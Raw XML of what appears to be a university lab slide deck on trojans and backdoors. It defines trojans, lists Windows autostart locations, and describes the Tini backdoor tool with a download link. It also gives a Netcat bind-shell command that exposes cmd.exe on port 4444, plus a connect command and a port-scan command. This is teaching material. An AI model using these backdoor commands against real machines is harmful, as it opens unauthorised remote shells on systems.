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94D4B-15C8-4170-B128-1D9D880D0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5DFD-C044-4E29-8374-57BBE3A34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9BD57-5C09-426D-AE6A-553AEEB2A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68744-1C62-4AE2-B82A-56744292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763CB-AB57-4469-929B-D9AC73F6A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9A000-6DC3-4113-BD55-5D992B60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4717-8D9C-4CBE-85D2-F04942ACC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F5B5-8587-4CF0-85E1-D7C628A0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A3EC-EA51-4266-9E0C-4C880BD9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247A9-35D0-45EB-9E1C-F2BBA060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B4AE-678A-41BC-A5A6-CA5C3475D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9081-4947-4F85-9BB6-67E18DBFC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4B85-D656-4122-A871-26A81182C3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oosoft.com/cleanet.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.moosoft.com/cleanet.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4 : Trojans and Backdoor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1889280" y="6208560"/>
            <a:ext cx="5654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vir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er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moosoft.com/cleanet.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and use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a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trojan using Tini or Net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 &l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ssion: Two weeks from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rojan horse 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lang="en-US" sz="2400" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>unauthorized program</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> contained within a legitimate program. This unauthorized program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000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>legitimate program that has been altered</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> by the placement of unauthorized code within it; this code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a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2400" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>program that appears to perform a desirable and necessary function but</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> that (because of unauthorized code within it that is unknown to the user) </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>performs functions unknown</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> (and definitely unwanted) by the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rojans send email or signal showing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ave auto-start (server starts when boot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ini, autoexec.bat,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y can also be us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KEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Ru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c:\directory\Trojan.ex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from a troja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can record monitor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amag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it as a zomb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it to incriminate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rious Trojan Gen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Access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Sending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log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l Of Service (DoS) Attack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tection Kill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Wingate Troj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ing tools : Tini</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53"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 is a simple and very small (3kb) backdoor for Windows, coded in assemb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istens at TCP port 7777 and gives anybody who connects a remote Command Promp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I use this too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the exe file and run it. Connect (with an ordinary telnet client or similar) to TCP port 7777 and press Enter once, now you'll see the Command Prompt and be able to type comma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Bas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Tini will create a backdoor into your computer! You should </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> use this tool for remote administration since it doesn't support neither authentication nor encryp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na try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tsecurity.nu/downloads/tini.ex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Netca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s army knife of networ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version of Netcat was written by hobbit and the NT version was done by Weld Po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code available (in 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bound or inbound connections, TCP or UDP, to or from any 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 source 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ly-configured network source addr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port-scanning capabilities, with randomiz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loose source-routing capa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example: Backdo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c -1 -p4444 -d -e cmd.exe -L</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uts netcat into a listening mod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4444 tells netcat to use port 4444</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llows netcat to run detached from the conso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cmd.exe tells netcat to execute the cmd.exe program when the connection is established,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will restart Netcat with the same command line when the connection is terminate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client syste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nc -v [ip address of targe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netcat to connect to the server whose IP is specified on por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is then given a console connection to the destination serve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name executa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use an open port through current fire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as a scann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nc -v -w 2 -z target 20–3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cat will try connecting to every port between 20 and 30 [inclusive] at the targ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form about an FTP server, telnet server, and mailer it has come across in the r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lab user</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2006-04-11T12:20:59Z</dcterms:modified>
  <cp:revision>15</cp:revision>
  <dc:subject/>
  <dc:title> ITCS 412 Lab 1 : Ethical Hacking, Footprinting, and Scanning a Network</dc:title>
</cp:coreProperties>
</file>